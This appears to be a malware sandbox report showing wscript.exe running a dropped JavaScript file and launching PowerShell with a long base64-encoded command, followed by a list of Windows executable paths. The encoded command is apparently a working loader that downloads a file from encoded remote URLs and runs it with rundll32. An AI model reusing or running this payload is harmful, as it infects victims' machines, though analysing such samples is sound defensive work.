parent_process | wscript.exe | martian_process | powershell -encodedcommand "JABIAG8AbABpAHMAdABBAGMAeQBsAGEAdABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABRAEEATwBRAEEAdQBBAEQASQBBAE4AQQBBADEAQQBDADQAQQBNAGcAQQB3AEEARABrAEEATABnAEEAeQBBAEQAQQBBAE8AUQBBAD0ARwBRAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE4AdwBBAHUAQQBEAEUAQQBOAGcAQQAxAEEAQwA0AEEATQBRAEEANQBBAEQAawBBAEwAZwBBAHgAQQBEAGMAQQBNAHcAQQA9ACIAOwAkAG4AaQBiAG8AbgBnACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgBBAEEAMwBBAEMANABBAE4AUQBBAHkAQQBDADQAQQBOAGcAQQA0AEEAQwA0AEEATQBRAEEAdwBBAEQAZwBBAFIARQBLAGwAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABVAEEATQBRAEEAdQBBAEQARQBBAE0AZwBBADMAQQBDADQAQQBNAFEAQQAzAEEARABnAEEATABnAEEAeABBAEQASQBBAE0AdwBBAD0AUgBFAEsAbABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFADAAQQBiAHcAQgBwAEEASABJAEEAWQBRAEIAcABBAEYAQQBBAGMAZwBCAGwAQQBIAEEAQQBkAFEAQgB3AEEARwBFAEEAYgBBAEEAdQBBAEcANABBAGQAUQBBAD0AIgA7ACQAWQBhAGsAbwBuAGEAbgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAGsAQQBHAGsAQQBjAHcAQgB6AEEASABVAEEAWQBRAEIAawBBAEcARQBBAFkAZwBCAHMAQQBIAGsAQQBMAGcAQgBwAEEARwA0AEEAYQB3AEEAPQB5AHQAZQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEkAQQBNAHcAQQB1AEEARABFAEEATgBBAEEAMABBAEMANABBAE4AQQBBAHcAQQBDADQAQQBOAGcAQQB3AEEAQQA9AD0AIgA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEANQA7ACQAYQBzAGUAYwByAGUAdABvAHIAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAUQBBAFkAUQBCAHMAQQBHAHcAQQBiAHcAQgAzAEEARgBJAEEAWQBRAEIAawBBAEcAawBBAGIAdwBCAHMAQQBHAGsAQQBkAEEAQgBsAEEAQwA0AEEAWgBRAEIANABBAEgAQQBBAGIAdwBCAHoAQQBHAFUAQQBaAEEAQQA9ACIAOwAkAGQAbwBlAGwAaQBuAGcAQQByAGMAaABvAHYAZQByAHMAZQBlAHIAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEQAQQBHADgAQQBjAHcAQgB0AEEARwA4AEEAWQB3AEIAeQBBAEcARQBBAGQAQQBBAHUAQQBIAFkAQQBhAFEAQgBoAEEARwBvAEEAWgBRAEIAegBBAEEAPQA9ACIAOwAkAGgAaQBiAGkAcwBjAHUAcwBlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAGcAQQBNAFEAQQB1AEEARABFAEEATgBnAEEAdwBBAEMANABBAE8AUQBBAHkAQQBDADQAQQBNAFEAQQA1AEEARABJAEEAYQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHIAQQBHAEUAQQBhAFEAQgAyAEEARwBFAEEAYgBBAEIANQBBAEcARQBBAEwAZwBCAHAAQQBHADQAQQBhAHcAQQA9AGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBCAEEASABNAEEAWgBRAEIAcwBBAEcAdwBBAFkAUQBCADAAQQBHAFUAQQBSAFEAQgB0AEEASABBAEEAYQBBAEIAbABBAEcAMABBAFoAUQBCAHkAQQBHAEUAQQBiAEEAQgB1AEEARwBVAEEAYwB3AEIAegBBAEMANABBAFkAdwBCAHYAQQBIAFUAQQBiAGcAQgAwAEEASABJAEEAZQBRAEEAPQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AZwBBADAAQQBDADQAQQBNAFEAQQA0AEEARABNAEEATABnAEEAeQBBAEQATQBBAE0AQQBBAHUAQQBEAGMAQQBOAHcAQQA9ACIAOwAkAGQAaQBvAHMAYwBvAHIAZQBpAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGMAQQBOAGcAQQB1AEEARABFAEEATQBnAEEAMABBAEMANABBAE0AUQBBADUAQQBEAGcAQQBMAGcAQQB5AEEARABFAEEATQB3AEEAdgBBAEUAWQBBAGMAdwBBADQAQQBGAEEAQQBlAFEAQQB2AEEARwB3AEEAUgBRAEIARgBBAEUAVQBBAFIAZwBBADQAQQBBAD0APQBiAHoAVQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBPAFEAQQB1AEEARABFAEEATgB3AEEAeQBBAEMANABBAE4AQQBBADEAQQBDADQAQQBOAHcAQQA1AEEAQwA4AEEAVQBBAEIAcwBBAEUAdwBBAE4AQQBCAHQAQQBGAFUAQQBMAHcAQgBuAEEARQBFAEEATQBBAEIAVQBBAEcAOABBAFMAQQBBAD0AYgB6AFUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATgBnAEEAdQBBAEQARQBBAE0AZwBBADAAQQBDADQAQQBNAFEAQQA1AEEARABnAEEATABnAEEAeQBBAEQARQBBAE0AZwBBAHYAQQBIAE0AQQBNAEEAQgBCAEEAQwA4AEEAYwB3AEIANgBBAEUAZwBBAFUAdwBCAEkAQQBEAE0AQQBSAHcAQgBFAEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQATABlAHAAcgBvAHQAaQBjAEYAaQBkAGQAbABpAGUAcwAgAGkAbgAgACQAZABpAG8AcwBjAG8AcgBlAGkAbgAgAC0AcwBwAGwAaQB0ACAAIgBiAHoAVQAiACkAIAB7ACQAQwBhAHMAcwBvAGMAawBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQBnAEEANQBBAEMANABBAE0AZwBBAHkAQQBEAFkAQQBMAGcAQQB5AEEARABJAEEATQBBAEEAdQBBAEQARQBBAE8AUQBBADQAQQBBAD0APQBXAGEAegBRAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAVABBAEcARQBBAGIAZwBCAGgAQQBIAFEAQQBiAHcAQgB5AEEARwBrAEEAYwBnAEIAcABBAEgAVQBBAGIAUQBCAHoAQQBGAE0AQQBkAEEAQgB5AEEARwBFAEEAWQB3AEIAagBBAEcAZwBBAGEAUQBCAHUAQQBHADgAQQBMAGcAQgAyAEEARwBrAEEAYgBBAEIAcwBBAEcARQBBAGMAdwBBAD0AVwBhAHoAUQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADAAQQBEAEUAQQBMAGcAQQB4AEEARABjAEEATgBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAFEAQQAwAEEARABnAEEAIgA7ACQAUABlAGMAaABlAGQATABhAGQAeQBoAG8AbwBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBwAEEARwA0AEEAZABBAEIAbABBAEgASQBBAFkAdwBCAHAAQQBIAEEAQQBhAFEAQgBsAEEARwA0AEEAZABBAEEAdQBBAEgAQQBBAGEAUQBCAGoAQQBIAFEAQQBkAFEAQgB5AEEARwBVAEEAYwB3AEEAPQBDAHIARgBsAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIASABBAEcAawBBAFkAUQBCAHQAQQBHAEkAQQBaAFEAQgAxAEEASABnAEEATABnAEIAcQBBAEgAQQBBACIAOwAkAHUAbgBzAGUAZQBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBrAEEARwBFAEEAYwBnAEIAbABBAEcARQBBAGIAQQBCAHMAQQBGAFUAQQBiAGcAQgB3AEEARwBFAEEAYwBnAEIAcgBBAEcAVQBBAFoAQQBBAHUAQQBHAFEAQQBaAFEAQgB1AEEASABRAEEAWQBRAEIAcwBBAEEAPQA9AGUAQQA9AHUAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQBRAEEANQBBAEMANABBAE0AZwBBADEAQQBEAFEAQQBMAGcAQQA0AEEARABRAEEATABnAEEAeABBAEQAUQBBAE4AdwBBAD0AZQBBAD0AdQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAEUAQQBjAFEAQgAxAEEARwBFAEEAYwBnAEIAcABBAEgATQBBAGQAQQBCAHoAQQBDADQAQQBZAHcAQgBoAEEARwBZAEEAWgBRAEEAPQAiADsAdAByAHkAIAB7ACQAQQBuAGkAcwBpAGwAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAE0AQQBaAFEAQgB0AEEARwBrAEEAYwBBAEIAeQBBAEcAOABBAGIAZwBCAGwAQQBHADQAQQBaAFEAQgB6AEEASABNAEEAVQBBAEIAbwBBAEcAOABBAGIAZwBCAHYAQQBIAE0AQQBMAGcAQgB1AEEASABrAEEAWQB3AEEAPQBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAZwBBAEwAZwBBAHgAQQBEAEUAQQBPAEEAQQB1AEEARABJAEEATQBBAEEAdwBBAEMANABBAE0AUQBBADMAQQBEAFkAQQAiADsAJABSAGUAdAByAG8AbQBpAGcAcgBhAHQAaQBvAG4AUwBhAGwAdABpAHIAZQB3AGkAcwBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABVAEEAYgBnAEIAdgBBAEcASQBBAGIAQQBCAHAAQQBHAGMAQQBZAFEAQgAwAEEARwBVAEEAWgBBAEIATgBBAEcAOABBAGMAZwBCADAAQQBHAEUAQQBiAEEAQgB6AEEAQwA0AEEAYwB3AEIAbwBBAEcAOABBAGQAdwBBAD0AIgA7ACQARQBsAGUAYwB0AHIAbwBsAHkAegBpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AUQBBADQAQQBDADQAQQBNAFEAQQAzAEEARABZAEEATABnAEEAeABBAEQATQBBAE4AZwBBAHUAQQBEAEkAQQBNAHcAQQA0AEEAQQA9AD0AIgA7ACQAbgBvAG4AbQBpAGwAaQB0AGEAbgB0AGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABMAGUAcAByAG8AdABpAGMARgBpAGQAZABsAGkAZQBzACkAKQA7AHcAZwBlAHQAIAAkAG4AbwBuAG0AaQBsAGkAdABhAG4AdABsAHkAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwASQBkAGUAbwBwAHIAYQB4AGkAcwB0AC4AUgB1AG0AaQBuAGEAdABpAHYAZQA7ACQARABhAG0AYQBzAGsAaQBuAGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFUAQQBOAEEAQQB1AEEARABFAEEATwBRAEEAeABBAEMANABBAE0AZwBBADAAQQBEAEUAQQBMAGcAQQA1AEEARABjAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwASQBkAGUAbwBwAHIAYQB4AGkAcwB0AC4AUgB1AG0AaQBuAGEAdABpAHYAZQApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIANQAxADcAMgA3ACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEASgBBAEIAbABBAEcANABBAGQAZwBBADYAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEARQBrAEEAWgBBAEIAbABBAEcAOABBAGMAQQBCAHkAQQBHAEUAQQBlAEEAQgBwAEEASABNAEEAZABBAEEAdQBBAEYASQBBAGQAUQBCAHQAQQBHAGsAQQBiAGcAQgBoAEEASABRAEEAYQBRAEIAMgBBAEcAVQBBAEwAQQBCADIAQQBHAGsAQQBjAEEAQgB6AEEARABzAEEAYwB3AEIAcwBBAEcARQBBAFkAdwBCAHIAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEAIgA7ACQAcwB1AG0AbQBpAG4AZwBzAFAAbwBsAGwAZQByAGEAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAegBBAEgAUQBBAGQAUQBCAGgAQQBIAEkAQQBkAEEAQgBwAEEARwBFAEEAUQB3AEIAaABBAEgASQBBAFoAQQBCADEAQQBHAFUAQQBiAEEAQgBwAEEASABNAEEATABnAEIAMwBBAEcAOABBAGMAZwBCAHIAQQBBAD0APQBKAE4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgB3AEEARwA4AEEAYQBRAEIAcgBBAEcAawBBAGIAQQBCAHYAQQBHAEkAQQBiAEEAQgBoAEEASABNAEEAZABBAEEAdQBBAEcATQBBAGIAdwBCADEAQQBIAEkAQQBjAHcAQgBsAEEASABNAEEAIgA7ACQAdABvAGcAbABlAHMAcwBDAG8AcgBuAGMAcgBhAGsAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgATQBBAGQAQQBCAGgAQQBIAEEAQQBhAEEAQgA1AEEARwB3AEEAYQBRAEIAdQBBAEcAVQBBAFYAQQBCAG8AQQBHAGsAQQBiAFEAQgBpAEEARwB3AEEAWgBRAEIAdABBAEcARQBBAGIAZwBBAHUAQQBHAE0AQQBiAHcAQgB0AEEAQQA9AD0AIgA7ACQAZwBsAHUAZQBtAGEAbgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAUQBBAEgASQBBAFoAUQBCADAAQQBIAEkAQQBZAFEAQgB1AEEASABNAEEAWQBRAEIAagBBAEgAUQBBAGEAUQBCAHYAQQBHADQAQQBTAGcAQgBoAEEASABJAEEAWgB3AEIAdgBBAEcAOABBAGIAZwBCAHoAQQBDADQAQQBZAHcAQgB2AEEARwA0AEEAZABBAEIAeQBBAEcARQBBAFkAdwBCADAAQQBHADgAQQBjAGcAQgB6AEEAQQA9AD0AZAB0AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AdwBBADIAQQBDADQAQQBNAFEAQQAxAEEARABJAEEATABnAEEAeABBAEQAWQBBAE0AdwBBAHUAQQBEAEkAQQBNAGcAQQA0AEEAQQA9AD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAJABTAHUAcgBhAGQAZABpAHQAaQBvAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFQAQQBHAGcAQQBhAFEAQgB1AEEASABRAEEAYgB3AEIAcABBAEgATQBBAGQAQQBCAEoAQQBIAE0AQQBiAHcAQgB0AEEARwBVAEEAYwBnAEIAdgBBAEcAMABBAGIAdwBCAHkAQQBIAEEAQQBhAEEAQgBwAEEASABNAEEAYgBRAEEAdQBBAEcATQBBAGIAdwBCAHQAQQBHADAAQQBkAFEAQgB1AEEARwBrAEEAZABBAEIANQBBAEEAPQA9AFcAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgB3AEEAdwBBAEMANABBAE0AZwBBADEAQQBEAFUAQQBMAGcAQQB4AEEARABRAEEATgBnAEEAdQBBAEQARQBBAE8AUQBBADIAQQBBAD0APQBXAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQATQBBAE4AQQBBAHUAQQBEAGsAQQBNAEEAQQB1AEEARABZAEEATgBnAEEAdQBBAEQAZwBBAE8AUQBBAD0AVwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHQAQQBHAEUAQQBiAGcAQgAwAEEARwBrAEEAYwB3AEIAcABBAEcARQBBAEwAZwBCADEAQQBIAE0AQQAiADsAJABpAGIAdQBwAHIAbwBmAGUAbgBEAGUAcgBlAGcAdQBsAGEAdABpAG8AbgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBjAEEAZABRAEIAaQBBAEcAVQBBAGMAZwBCAHUAQQBHAEUAQQBiAGcAQgBqAEEARwBVAEEATABnAEIAagBBAEcARQBBAFoAZwBCAGwAQQBBAD0APQBGAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAQQBBAGIAdwBCAHMAQQBIAGsAQQBjAEEAQgBvAEEARwA4AEEAYgBnAEIAcABBAEgATQBBAGIAUQBCAEMAQQBHAHcAQQBaAFEAQgB3AEEARwBnAEEAWQBRAEIAeQBBAEcAOABBAGMAQQBCAG8AQQBIAFEAQQBhAEEAQgBoAEEARwB3AEEAYgBRAEIAcABBAEcARQBBAEwAZwBCAG8AQQBHADgAQQBjAGcAQgB6AEEARwBVAEEARgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEoAQQBHADQAQQBjAHcAQgAwAEEARwBrAEEAZABBAEIAMQBBAEgAUQBBAFoAUQBCAHkAQQBIAE0AQQBVAHcAQgB0AEEARwA4AEEAYQB3AEIAbABBAEgATQBBAEwAZwBCAGkAQQBHAEUAQQBiAGcAQgBrAEEAQQA9AD0AIgA7AH0AfQAkAFYAaQB0AHQAbABpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMgBBAEQAQQBBAEwAZwBBAHkAQQBEAEUAQQBOAHcAQQB1AEEARABZAEEATwBRAEEAdQBBAEQASQBBAE0AdwBBAHgAQQBBAD0APQBvAG4AYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQAwAEEAWgBRAEIAegBBAEcAMABBAFoAUQBCAHkAQQBHAGsAQQBjAHcAQgBsAEEAQwA0AEEAWgBnAEIAaABBAEcAawBBAGIAQQBBAD0AbwBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE8AUQBBAHUAQQBEAEUAQQBOAGcAQQA1AEEAQwA0AEEATgBnAEEANQBBAEMANABBAE0AZwBBAHoAQQBEAEkAQQBvAG4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATQBnAEEAdQBBAEQARQBBAE4AUQBBADAAQQBDADQAQQBNAFEAQQB4AEEARABZAEEATABnAEEAeABBAEQAYwBBAE8AQQBBAD0AIgA7ACQAbQBpAGMAcgBvAHAAaABhAGcAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AZwBBAHcAQQBDADQAQQBOAGcAQQB5AEEAQwA0AEEATQBRAEEAMgBBAEQAQQBBAEwAZwBBAHkAQQBEAEkAQQBOAGcAQQA9AHEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBZAEEAWQBRAEIAdABBAEcAawBBAGIAQQBCAHAAQQBHAEUAQQBjAGcAQgBwAEEASABRAEEAZQBRAEEAdQBBAEcAUQBBAGIAdwBCADMAQQBHADQAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAPQAiADsA" | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\wscript.exe" "C:\ProgramData\aeolus.js" OxeyesSpondaic quadragesima feculence TouristshipFeldspathization | ||||||
parent_process | wscript.exe | martian_process | wscript "C:\ProgramData\aeolus.js" OxeyesSpondaic quadragesima feculence TouristshipFeldspathization |
file | C:\Windows\SysWOW64\wscript.exe |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |